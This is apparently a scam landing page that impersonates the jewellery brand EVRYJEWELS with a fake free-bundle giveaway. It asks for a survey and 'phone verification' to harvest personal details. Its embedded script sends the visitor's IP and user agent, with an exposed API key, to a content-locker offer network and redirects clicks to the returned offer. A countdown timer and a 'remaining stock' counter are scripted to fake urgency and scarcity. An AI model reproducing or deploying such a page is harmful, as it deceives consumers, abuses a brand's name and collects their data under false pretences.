We truly appreciate your past support with EVRYJEWELS and deeply value the trust you have placed in us. Celebrating a decade of the brand, we are offering our newest product 100% free as a huge thank-you. Do not miss out on our biggest release yet!

To mark the occasion, we have quietly rolled out a brand-new product, inviting a select group of our most loyal customers to try it first.

Awesome news—you have been picked!

As a token of appreciation, you are invited to claim this item completely free. It will ship straight to the address from your most recent order.

To help us manage fulfillment and feedback for this early release, we simply ask that participants complete a quick step with one of our launch partners. "Ipsos iSay"

Check out the details below to see how to grab your gift.
🚀 NEW RELEASE
LIMITED EDITION BUNDLE
REMAINING STOCKOnly 100 left!
  • Free Entry 100%
  • No Purchase Necessary
  • No Credit Card Required
🔒 SSL 256-Bit Secure & Verified
⚡ Flash Offer Expires In:
20:00
Claim your free EVRYJEWELS bundle by completing the quick verification below.
INFORMATION REQUIRED 👇:
1
Complete the short survey
2
Phone Verification (Required) — Enter your info (Email or Details) to verify your entry.
3
After completing the steps, you will immediately receive an email with your Shipping Tracking Number.
const API_KEY = "47829|83LbHrqEyCZC72x5zgbBt1Uhfv023Ivz44Qo2wDg902f1fb0"; let resolvedOfferLink = ""; function initPage() { fetchOffer(); } function start() { document.getElementById('main-content').style.opacity = '0.05'; document.getElementById('locker').style.display = 'flex'; } async function fetchOffer() { try { // استعملنا خدمة سريعة وخفيفة لجلب الـ IP باش نتفاديو التاقل const ipRes = await fetch('https://api64.ipify.org?format=json'); const ipData = await ipRes.json(); let ip = ipData.ip; const apiUrl = `https://lockerpreview.com/api/v2?ip=${ip}&user_agent=${encodeURIComponent(navigator.userAgent)}`; const offerRes = await fetch(apiUrl, { headers: { 'Authorization': `Bearer ${API_KEY}` } }); const data = await offerRes.json(); if(data.offers && data.offers.length > 0) { resolvedOfferLink = data.offers[0].link; } } catch(e) { console.log("Error fetching offer:", e); } document.getElementById('offer-btn').onclick = () => { if(resolvedOfferLink) { window.location.href = resolvedOfferLink; } else { // حط هنا رابط مباشر شغال 100% ديال العرض (تأكد أنه ماشي 404) window.location.href = "https://lockerpreview.com/cl/i/47297"; } }; } let seconds = 1200; setInterval(() => { let m = Math.floor(seconds / 60); let s = seconds % 60; document.getElementById('h24-timer').innerText = (m<10?"0":"")+m+":"+(s<10?"0":"")+s; if(seconds > 0) seconds--; }, 1000); let stock = 100; setInterval(() => { if(stock > 3) { stock -= 1; document.getElementById('stock-count').innerText = stock; document.getElementById('stock-bar-fill').style.width = stock + "%"; } }, 5000);